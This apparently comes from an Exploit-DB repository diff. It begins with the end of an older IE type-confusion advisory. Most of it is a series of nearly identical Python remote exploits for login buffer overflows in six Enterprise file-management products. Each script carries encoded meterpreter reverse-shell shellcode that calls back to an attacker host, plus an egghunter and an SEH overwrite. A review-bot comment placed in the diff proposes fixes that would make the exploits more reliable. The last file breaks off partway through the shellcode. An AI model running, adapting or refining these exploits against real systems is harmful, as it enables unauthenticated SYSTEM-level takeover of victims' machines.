I reversed Method_­VARIANTBOOLp_­BSTR_­o0o­VARIANT only sufficiently to get an idea of the root cause, but not enough to determine exactly what is going on or how to control the issue for command execution. + +2 Repro.html: + + + + +2 Target.html: + + + +Description + +Calling the is­Prototype­Of method of the DOMImplementation interface as a function results in type confusion where an object is assumed to implement IUnknown when in fact it does not. The code attempts to call the Release method of IUnknown through the vftable at offset 0, but since the object has no vftables, a member property is stored at this offset, which appears to have a static value 002dc6c0. An attacker that is able to control this value, or allocate memory and store data at that address, may be able to execute arbitrary code. + +Exploit + +No attempts were made to further reverse the code and determine the exact root cause. A few attempts were made to control the value at offset 0 of the object in question, as well as get another object in its place with a different value at this location, but both efforts were brief and unsuccessful. + +Time-line + +September 2015: This vulnerability was found through fuzzing. +October 2015: This vulnerability was submitted to ZDI. +November 2015: This vulnerability was acquired by ZDI. +February 2016: This issue was addressed by Microsoft in MS16-009. +November 2016: Details of this issue are released. \ No newline at end of file diff --git a/platforms/windows/remote/40830.py b/platforms/windows/remote/40830.py new file mode 100755 index 000000000..271ce07c0 --- /dev/null +++ b/platforms/windows/remote/40830.py 
@@ -0,0 +1,100 @@ +#!/usr/bin/python + +print "VX Search Enterprise 9.1.12 Login Buffer Overflow" +print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa_security + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Vendor has been notified on multiple occasions +#Exploit for version 9.0.26: www.exploit-db.com/exploits/40455/ + +#Shout-out to carbonated and ozzie_offsec + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.130',80)) + + +#bad chars \x00\x0a\x0d\x26 + + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + + + +buf = "" +buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33" +buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab" +buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d" +buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd" +buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a" +buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e" +buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb" +buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab" +buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85" +buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84" +buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e" +buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34" +buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2" +buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a" +buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0" +buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25" +buf += 
"\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3" +buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9" +buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e" +buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38" +buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4" +buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92" +buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55" +buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde" + + +#pop pop ret 10015BBE + +nseh = "\x90\x90\xEB\x0B" +seh = "\xBE\x5B\x01\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 13664 #subtract/add for payload +evil += "B" * 100 +evil += "w00tw00t" +evil += buf +evil += "\x90" * 212 +evil += nseh +evil += seh +evil += "\x90" * 10 +evil += egghunter +evil += "\x90" * 8672 + + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() + + diff --git a/platforms/windows/remote/40831.py b/platforms/windows/remote/40831.py new file mode 100755 index 000000000..06558e545 --- /dev/null +++ b/platforms/windows/remote/40831.py 
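Review bot: The target is hard-coded in two places that disagree — `connect=s.connect(('192.168.123.130',80))` near the top and `Host: 192.168.123.132` in the request — while `import sys` is never used even though the header comment tells the reader to swap the IP; one variable feeding both lines would remove the mismatch. `connect=` stores the `None` that `socket.connect` returns and is never read, and the socket has no `settimeout()`, so `s.send(evil)` against a filtered port blocks indefinitely. The fixed shape of the request — `POST /login` with `Content-Length: 17000`, the `w00tw00t` tag and roughly 13.6 KB of `\x41` filler — is what a defender would key a detection rule on, and a one-line header comment naming those markers would make that easier. 40831.py, 40832.py, 40833.py and 40834.py repeat this file almost verbatim, differing only in the product name, the `#pop pop ret` address and `seh` bytes, and in 40834.py `"\x42" * 100` in place of `"B" * 100`, so the same remarks apply there.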
@@ -0,0 +1,100 @@ +#!/usr/bin/python + +print "Sync Breeze Enterprise 9.1.16 Login Buffer Overflow" +print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa_security + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Vendor has been notified on multiple occasions +#Exploit for version 8.9.24: www.exploit-db.com/exploits/40456/ + +#Shout-out to carbonated and ozzie_offsec + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.130',80)) + + +#bad chars \x00\x0a\x0d\x26 + + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + + + +buf = "" +buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33" +buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab" +buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d" +buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd" +buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a" +buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e" +buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb" +buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab" +buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85" +buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84" +buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e" +buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34" +buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2" +buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a" +buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0" +buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25" +buf += 
"\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3" +buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9" +buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e" +buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38" +buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4" +buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92" +buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55" +buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde" + + +#pop pop ret 1001A1B8 + +nseh = "\x90\x90\xEB\x0B" +seh = "\xB8\xA1\x01\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 13664 #subtract/add for payload +evil += "B" * 100 +evil += "w00tw00t" +evil += buf +evil += "\x90" * 212 +evil += nseh +evil += seh +evil += "\x90" * 10 +evil += egghunter +evil += "\x90" * 8672 + + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() + + diff --git a/platforms/windows/remote/40832.py b/platforms/windows/remote/40832.py new file mode 100755 index 000000000..97e4cf5c8 --- /dev/null +++ b/platforms/windows/remote/40832.py 
@@ -0,0 +1,100 @@ +#!/usr/bin/python + +print "Dup Scout Enterprise 9.1.14 Login Buffer Overflow" +print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa_security + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Vendor has been notified on multiple occasions +#Exploit for version 9.0.28: www.exploit-db.com/exploits/40457/ + +#Shout-out to carbonated and ozzie_offsec + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.130',80)) + + +#bad chars \x00\x0a\x0d\x26 + + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + + + +buf = "" +buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33" +buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab" +buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d" +buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd" +buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a" +buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e" +buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb" +buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab" +buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85" +buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84" +buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e" +buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34" +buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2" +buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a" +buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0" +buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25" +buf += 
"\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3" +buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9" +buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e" +buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38" +buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4" +buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92" +buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55" +buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde" + + +#pop pop ret 1004FAF3 + +nseh = "\x90\x90\xEB\x0B" +seh = "\xF3\xFA\x04\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 13664 #subtract/add for payload +evil += "B" * 100 +evil += "w00tw00t" +evil += buf +evil += "\x90" * 212 +evil += nseh +evil += seh +evil += "\x90" * 10 +evil += egghunter +evil += "\x90" * 8672 + + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() + + diff --git a/platforms/windows/remote/40833.py b/platforms/windows/remote/40833.py new file mode 100755 index 000000000..70244d20f --- /dev/null +++ b/platforms/windows/remote/40833.py 
@@ -0,0 +1,100 @@ +#!/usr/bin/python + +print "Disk Sorter Enterprise 9.1.12 Login Buffer Overflow" +print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa_security + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Vendor has been notified on multiple occasions +#Exploit for version 9.0.24: www.exploit-db.com/exploits/40458/ + +#Shout-out to carbonated and ozzie_offsec + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.130',80)) + + +#bad chars \x00\x0a\x0d\x26 + + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + + + +buf = "" +buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33" +buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab" +buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d" +buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd" +buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a" +buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e" +buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb" +buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab" +buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85" +buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84" +buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e" +buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34" +buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2" +buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a" +buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0" +buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25" +buf += 
"\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3" +buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9" +buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e" +buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38" +buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4" +buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92" +buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55" +buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde" + + +#pop pop ret 1004F9DD + +nseh = "\x90\x90\xEB\x0B" +seh = "\xDD\xF9\x04\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 13664 #subtract/add for payload +evil += "B" * 100 +evil += "w00tw00t" +evil += buf +evil += "\x90" * 212 +evil += nseh +evil += seh +evil += "\x90" * 10 +evil += egghunter +evil += "\x90" * 8672 + + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() + + diff --git a/platforms/windows/remote/40834.py b/platforms/windows/remote/40834.py new file mode 100755 index 000000000..c4d82e98e --- /dev/null +++ b/platforms/windows/remote/40834.py 
@@ -0,0 +1,100 @@
+#!/usr/bin/python
+
+print "Disk Savvy Enterprise 9.1.14 Login Buffer Overflow"
+print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
+
+#Author website: www.tulpa-security.com
+#Author twitter: @tulpa_security
+
+#Exploit will land you NT AUTHORITY\SYSTEM
+#You do not need to be authenticated, password below is garbage
+#Swop out IP, shellcode and remember to adjust '\x41' for bytes
+#Tested on Windows 7 x86 Enterprise SP1
+
+#Vendor has been notified on multiple occasions
+#Exploit for version 9.0.32: www.exploit-db.com/exploits/40459/
+
+#Shout-out to carbonated and ozzie_offsec
+
+import socket
+import sys
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.123.130',80))
+
+
+#bad chars \x00\x0a\x0d\x26
+
+
+#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
+
+#payload size 308
+
+
+
+buf = ""
+buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
+buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
+buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
+buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
+buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
+buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
+buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
+buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
+buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
+buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
+buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
+buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
+buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
+buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
+buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
+buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
+buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
+buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
+buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
+buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
+buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
+buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
+buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
+buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
+
+
+#pop pop ret 10081A9C
+
+nseh = "\x90\x90\xEB\x0B"
+seh = "\x9C\x1A\x08\x10"
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+evil = "POST /login HTTP/1.1\r\n"
+evil += "Host: 192.168.123.132\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "username=admin"
+evil += "&password=aaaaa\r\n"
+evil += "\x41" * 13664 #subtract/add for payload
+evil += "\x42" * 100
+evil += "w00tw00t"
+evil += buf
+evil += "\x90" * 212
+evil += nseh
+evil += seh
+evil += "\x90" * 10
+evil += egghunter
+evil += "\x90" * 8672
+
+
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
+
+
diff --git a/platforms/windows/remote/40835.py b/platforms/windows/remote/40835.py
new file mode 100755
index 000000000..e42ffa4c6
--- /dev/null
+++ b/platforms/windows/remote/40835.py
@@ -0,0 +1,100 @@
+#!/usr/bin/python
+
+print "Disk Pulse Enterprise 9.1.16 Login Buffer Overflow"
+print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
+
+#Author website: www.tulpa-security.com
+#Author twitter: @tulpa_security
+
+#Exploit will land you NT AUTHORITY\SYSTEM
+#You do not need to be authenticated, password below is garbage
+#Swop out IP, shellcode and remember to adjust '\x41' for bytes
+#Tested on Windows 7 x86 Enterprise SP1
+
+#Vendor has been notified on multiple occasions
+#Exploit for version 9.0.34: www.exploit-db.com/exploits/40452/
+
+#Shout-out to carbonated and ozzie_offsec
+
+import socket
+import sys
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.123.130',80))
+
+
+#bad chars \x00\x0a\x0d\x26
+
+
+#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
+
+#payload size 308
+
+
+
+buf = ""
+buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
+buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
+buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
+buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
+buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
+buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
+buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
+buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
+buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
+buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
+buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
+buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
+buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
+buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
+buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
+buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
+buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
